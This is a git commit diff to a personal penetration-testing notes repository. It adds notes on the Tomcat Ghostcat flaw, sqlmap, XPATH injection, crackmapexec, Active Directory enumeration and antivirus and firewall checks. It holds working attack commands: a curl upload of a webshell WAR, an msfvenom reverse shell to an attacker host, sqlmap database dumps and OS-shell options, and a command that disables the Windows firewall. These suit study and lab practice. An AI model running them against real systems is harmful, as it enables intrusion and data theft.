bump
This commit is contained in:
parent
0caf7edbf6
commit
361227c060
|
|
@ -1,5 +1,7 @@
|
|||
# Ret2libc
|
||||
|
||||
* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
|
||||
|
||||
* Check binary via
|
||||
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
|
||||
* `file`
|
||||
|
|
|
|||
|
|
@ -0,0 +1,14 @@
|
|||
# Ghostcat
|
||||
|
||||
* CVE-2020-1938
|
||||
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
|
||||
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
|
||||
* upload the file via
|
||||
```sh
|
||||
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
|
||||
```
|
||||
* Visit the webshell at `$TARGET_IP:8080/shello/`
|
||||
* Alternatively use a war reverse shell via
|
||||
```sh
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
|
||||
```
|
||||
|
|
@ -135,40 +135,6 @@ GET /about/0 UNION select column_name, null,null,null,null from information_sche
|
|||
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
|
||||
```
|
||||
|
||||
## Tools
|
||||
### SQLmap
|
||||
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||
* Use `-r` with a saved HTTP request
|
||||
```sh
|
||||
sqlmap -r request.txt --dbms=mysql --dump
|
||||
sqlmap -r request.txt --batch
|
||||
```
|
||||
* Select form data automatically
|
||||
```sh
|
||||
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|
||||
```
|
||||
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|
||||
|
||||
|
||||
|Parameter|Details|
|
||||
|-r|Uses the intercepted request save as a file|
|
||||
|--dbms|DBMS of target|
|
||||
|--dump|Dump the entire database|
|
||||
|--dump-all|Dump everything|
|
||||
|-p |TESTPARAMETER|
|
||||
|--os-shell|Prompt for an interactive operating system shell|
|
||||
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
||||
|
||||
### Damn Small SQLi Scanner (DSSS)
|
||||
* [Script](https://github.com/stamparm/DSSS.git)
|
||||
```sh
|
||||
python dsss.py -u "http://example.com/index.php?id="
|
||||
```
|
||||
|
||||
### Online sqlmap
|
||||
* [Link](https://suip.biz/?act=sqlmap)
|
||||
|
||||
## Payloads
|
||||
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
|
||||
|
||||
|
|
|
|||
|
|
@ -0,0 +1,43 @@
|
|||
# SQLmap
|
||||
|
||||
|
||||
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||
|
||||
## Usage
|
||||
|
||||
* Use `-r` with a saved HTTP request
|
||||
```sh
|
||||
sqlmap -r request.txt --dbms=mysql --dump
|
||||
sqlmap -r request.txt --batch
|
||||
```
|
||||
* Select form data automatically
|
||||
```sh
|
||||
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|
||||
```
|
||||
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|
||||
|
||||
|
||||
|Parameter|Details|
|
||||
|-r|Uses the intercepted request save as a file|
|
||||
|--dbms|DBMS of target|
|
||||
|--dump|Dump the entire database|
|
||||
|--dump-all|Dump everything|
|
||||
|-p |TESTPARAMETER|
|
||||
|--os-shell|Prompt for an interactive operating system shell|
|
||||
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
||||
|--tables|Show tables|
|
||||
|-T|Specify table|
|
||||
|
||||
## Other Tools
|
||||
|
||||
### Damn Small SQLi Scanner (DSSS)
|
||||
* [Script](https://github.com/stamparm/DSSS.git)
|
||||
```sh
|
||||
python dsss.py -u "http://example.com/index.php?id="
|
||||
```
|
||||
|
||||
### Online sqlmap
|
||||
* [Link](https://suip.biz/?act=sqlmap)
|
||||
|
||||
|
|
@ -1 +1 @@
|
|||
Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15
|
||||
Subproject commit 616b0e527f62dd0930e6346ede6bef79e9bcf717
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
# XPATH injection
|
||||
|
||||
* Similar to SQL injection, it is a input/parameter injection
|
||||
|
||||
* [payloads all the things XPATH](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
|
||||
* Use [lanfran's payload list](https://lanfran02.github.io/posts/cold_vvars/XPATH_list.txt) as burpsuite sniper payload
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
# crackmapexec
|
||||
|
||||
* In general, the syntax is as follows
|
||||
```sh
|
||||
crackmapexec smb $DOMAIN -u <user> -p <password>
|
||||
```
|
||||
* Do not set the domain at the end, it won't work.
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,3 @@
|
|||
# SMTP
|
||||
|
||||
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
# Active Directory Enumeration
|
||||
|
||||
* Consists of
|
||||
* Domain Controller
|
||||
* Organizational Units
|
||||
* AD Domains
|
||||
* AD Forest
|
||||
|
||||
* Administrative accounts are
|
||||
* Domain Admin
|
||||
* Enterprise Admin
|
||||
* Schema Admin
|
||||
* Server Operator
|
||||
* Account Operator
|
||||
|
||||
## Usage
|
||||
|
||||
* `systeminfo | findstr Domain`
|
||||
* `Get-ADUser -filter *`
|
||||
* Use found CN and DC and specify
|
||||
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
|
||||
|
||||
### DNS
|
||||
* Check ip via `ipconfig`
|
||||
* `nslookup`, then `server <LocalIP>` and zone transfer via
|
||||
```sh
|
||||
ls -d <Domain>
|
||||
```
|
||||
|
||||
|
||||
|
|
@ -8,6 +8,32 @@
|
|||
* Static Detection -- Hash or String/Byte Matching
|
||||
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
|
||||
|
||||
## Enumeration
|
||||
```sh
|
||||
wmic /namespace:\\root\securitycenter2 path antivirusproduct
|
||||
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
|
||||
```
|
||||
```sh
|
||||
Get-Service WinDefend
|
||||
Get-MpComputerStatus | select RealTimeProtectionEnabled
|
||||
```
|
||||
* Check firewall
|
||||
```sh
|
||||
Get-NetFirewallProfile | Format-Table Name, Enabled
|
||||
```
|
||||
```sh
|
||||
Get-NetFirewallRule | select DisplayName, Enabled, Description
|
||||
```
|
||||
* Check inbound port availability
|
||||
```sh
|
||||
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
|
||||
```
|
||||
|
||||
## Reset Options
|
||||
```sh
|
||||
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
|
||||
```
|
||||
|
||||
## Anti Malware Secure Interface
|
||||
* https://docs.microsoft.com/en-us/windows/win32/amsi/
|
||||
|
||||
|
|
@ -8,3 +8,9 @@ reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transc
|
|||
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
|
||||
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
```sh
|
||||
Get-EventLog -List
|
||||
```
|
||||
|
|
|
|||
File diff suppressed because one or more lines are too long
|
|
@ -1 +1 @@
|
|||
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470
|
||||
Subproject commit 7c94b90223cd40c664b6e0107b5f1bf744ab5d17
|
||||
|
|
@ -1 +1 @@
|
|||
Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db
|
||||
Subproject commit 7c275d50bc324f3152650fe22b3f92bb4da23275
|
||||
Loading…
Reference in New Issue